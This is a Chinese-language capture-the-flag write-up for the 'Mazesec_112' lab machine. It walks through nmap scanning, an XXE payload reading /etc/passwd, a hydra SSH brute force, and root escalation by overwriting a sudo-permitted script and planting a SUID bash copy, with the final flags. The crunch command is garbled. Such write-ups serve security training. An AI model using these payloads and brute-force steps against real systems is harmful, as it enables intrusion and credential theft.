Mazesec_112

靶机来源：QQ群-660930334

难度：Easy

一、信息收集

1、主机探测

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24              
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-16 12:28 +0800
Nmap scan report for 192.168.2.1
Host is up (0.00052s latency).
MAC Address: 0A:00:27:00:00:06 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00043s latency).
MAC Address: 08:00:27:1B:FF:4E (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.49
Host is up (0.00052s latency).
MAC Address: 08:00:27:53:8C:29 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 4.12 seconds

靶机IP：192.168.2.49

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.49                   
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-16 12:28 +0800
Nmap scan report for 192.168.2.49
Host is up (0.00057s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:53:8C:29 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 36.12 seconds

开放端口：22、80

2.详细信息扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,80 192.168.2.49
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-16 12:29 +0800
Nmap scan report for 192.168.2.49
Host is up (0.00088s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: XML Parser
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:53:8C:29 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.72 seconds

3.udp扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.49                    
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-16 12:30 +0800
Nmap scan report for 192.168.2.49
Host is up (0.00091s latency).
Not shown: 99 closed udp ports (port-unreach)
PORT   STATE         SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:53:8C:29 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 106.06 seconds

二、WEB渗透

1、80网站

访问80端口，发现是一个解析XML的功能

2、XXE漏洞

XML 解析器如果启用了外部实体（external entities），就可能被利用 尝试去读取/etc/passwd

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>

找到用户tuf和密码KQNPHFqG**JHcYJossIe

三、SSH密码爆破

发现用户tuf的密码存在两位未知的字母，尝试使用hydra进行爆破

1. 先使用crunch生成字典

┌──(root㉿kali)-[~/miaosec]
└─# cruncrunch -f /-f /usr/share/crunch/charset.lstalpha-numeric | \ |
  awk '{print "KQNPHFqG" $0 "JHcYJossIe"}' > tuf_passwords.txt
Crunch will now generate the following amount of data: 11532 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 3844 

1. 使用hydra进行爆破

┌──(root㉿kali)-[~/miaosec]
└─# hydra -l tuf -P ./pass.txt -s 22 ssh://192.168.2.49 -t 4 -v -I -e nsr
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-01-16 12:50:05
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 3847 login tries (l:1/p:3847), ~962 tries per task
[DATA] attacking ssh://192.168.2.49:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://tuf@192.168.2.49:22
[INFO] Successful, password authentication is supported by ssh://192.168.2.49:22
[STATUS] 73.00 tries/min, 73 tries in 00:01h, 3774 to do in 00:52h, 4 active
[STATUS] 71.00 tries/min, 213 tries in 00:03h, 3634 to do in 00:52h, 4 active
[22][ssh] host: 192.168.2.49   login: tuf   password: KQNPHFqG6mJHcYJossIe
[STATUS] attack finished for 192.168.2.49 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-01-16 12:53:32

成功找到用户tuf的密码KQNPHFqG6mJHcYJossIe

四、获取tuf权限

使用凭证：tuf:KQNPHFqG6mJHcYJossIe进行登录

┌──(root㉿kali)-[~/miaosec]
└─# ssh tuf@192.168.2.49
...
tuf@112:~$ id
uid=1000(tuf) gid=1000(tuf) groups=1000(tuf)

五、权限提升

查看sudo -l

tuf@112:~$ sudo -l
Matching Defaults entries for tuf on 112:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User tuf may run the following commands on 112:
    (ALL) NOPASSWD: /opt/112.sh

查看/opt/112.sh

#!/bin/bash
input_url=""
output_file=""
use_file=false
regex='^https://maze-sec.com/[a-zA-Z0-9/]*$'
while getopts ":u:o:" opt; do
    case ${opt} in
        u) input_url="$OPTARG" ;;
        o) output_file="$OPTARG"; use_file=true ;;
        \?) echo "错误: 无效选项 -$OPTARG"; exit 1 ;;
        :) echo "错误: 选项 -$OPTARG 需要一个参数"; exit 1 ;;
    esac
done
if [[ -z "$input_url" ]]; then
    echo "错误: 必须使用 -u 参数提供URL"
    exit 1
fi
if [[ ! "$input_url" =~ ^https://maze-sec.com/ ]]; then
    echo "错误: URL必须以 https://maze-sec.com/ 开头"
    exit 1
fi
if [[ ! "$input_url" =~ $regex ]]; then
    echo "错误: URL包含非法字符，只允许字母、数字和斜杠"
    exit 1
fi
if (( RANDOM % 2 )); then
    result="$input_url is a good url."
else
    result="$input_url is not a good url."
fi
if [ "$use_file" = true ]; then
    echo "$result" > "$output_file"
    echo "结果已保存到: $output_file"
else
    echo "$result"
fi

脚本的功能：接受一个 URL 参数 -u ，并判断 URL 是否符合要求，然后输出随机结果，若指定了 -o 参数则将结果写入文件，url 部分可控，任意文件覆盖。

tao佬的方案

【前置知识】

• 1、unix 路径中如果存在多个 / 等价于单个 / ，例如 /opt//112.sh 等价于 /opt/112.sh 。
• 2、在 Linux 中，目录名和文件名几乎可以使用任何字符（除了 / 和 null 字符），包括空格、制表符、换行符以及其他特殊字符都是允许的。
• 3、当 sudo/ shell 尝试执行一个无 shebang 的可执行文本文件时，底层 execve 返回ENOEXEC，调用方通常会退回用 /bin/sh（或其指定的 shell）来解释执行该文件。

【路径解析利用】 如果命令名包含 /，shell 会将其视为路径（绝对或相对）直接执行，而不会在 $PATH 中查找；若为相对路径，则以当前工作目录为基准解析。

核心原理： 这个脚本的 -o 参数允许我们将验证结果（如 https://maze-sec.com/111 is a good url.）写入任意文件。

1. 如果我们利用这一特性，将结果覆盖脚本自身（/opt/112.sh），旧的脚本内容（包括#!/bin/bash）就会丢失。
2. 当我们再次 sudo 执行该脚本时，Shell 读取到的第一行代码变成了以 https:// 开头的字符串。
3. 由于该字符串包含 /，Shell 会将其视为相对路径命令执行，即尝试在当前目录下寻找 https: 文件夹下的 maze-sec.com 文件夹下的 111 可执行文件。
4. 只要我们提前在当前目录构建好这个文件夹结构并放入恶意文件，即可实现 Root 权限命令执行。

测试

tuf@112:/tmp$ echo 'https://maze-sec.com/111 is good url.' > test.sh
tuf@112:/tmp$ chmod +x test.sh 
tuf@112:/tmp$ ./test.sh 
./test.sh: line 1: https://maze-sec.com/111: No such file or directory

tuf@112:/tmp$ mkdir -p 'https://maze-sec.com'
tuf@112:/tmp$ echo "whoami" > https:/maze-sec.com/111
tuf@112:/tmp$ chmod +x https:/maze-sec.com/111
tuf@112:/tmp$ ./test.sh 
tuf

成功执行了 https://maze-sec.com/111 脚本，输出 tuf 用户名

如果把 https://maze-sec.com/111 is a good url. 输出覆盖 /opt/112.sh 脚本，再用 sudo 执行，通过修改 111 文件内容就可以实现任意命令执行

tuf@112:/tmp$ sudo /opt/112.sh -o /opt/112.sh -u https://maze-sec.com/111
/etc/sudoers.d/tuf:1:6: syntax error
https://maze-sec.com/ is not a good url.
     ^
root
tuf@112:/tmp$ cat /opt/112.sh 
https://maze-sec.com/111 is not a good url.

tuf@112:/tmp$ sudo /opt/112.sh 
/etc/sudoers.d/tuf:1:6: syntax error
https://maze-sec.com/ is not a good url.
     ^
root

tuf@112:/tmp$ echo 'cp /bin/bash /tmp/bash;chmod +s /tmp/bash' > https:/maze-sec.com/111

tuf@112:/tmp$ sudo /opt/112.sh 
/etc/sudoers.d/tuf:1:6: syntax error
https://maze-sec.com/ is not a good url.
     ^
    
tuf@112:/tmp$ ls -la /tmp/bash
-rwsr-sr-x 1 root root 1168776 Jan 19 04:31 /tmp/bash

tuf@112:/tmp$ /tmp/bash -p
bash-5.0# id
uid=1000(tuf) gid=1000(tuf) euid=0(root) egid=0(root) groups=0(root),1000(tuf)

六、查看FLAG

bash-5.0# cat /root/root.txt /home/tuf/user.txt 
flag{root-538dc127225a0c97b060b1ff9570390a}
flag{user-b1e12c74f19aac8e57f6fca1ff472905}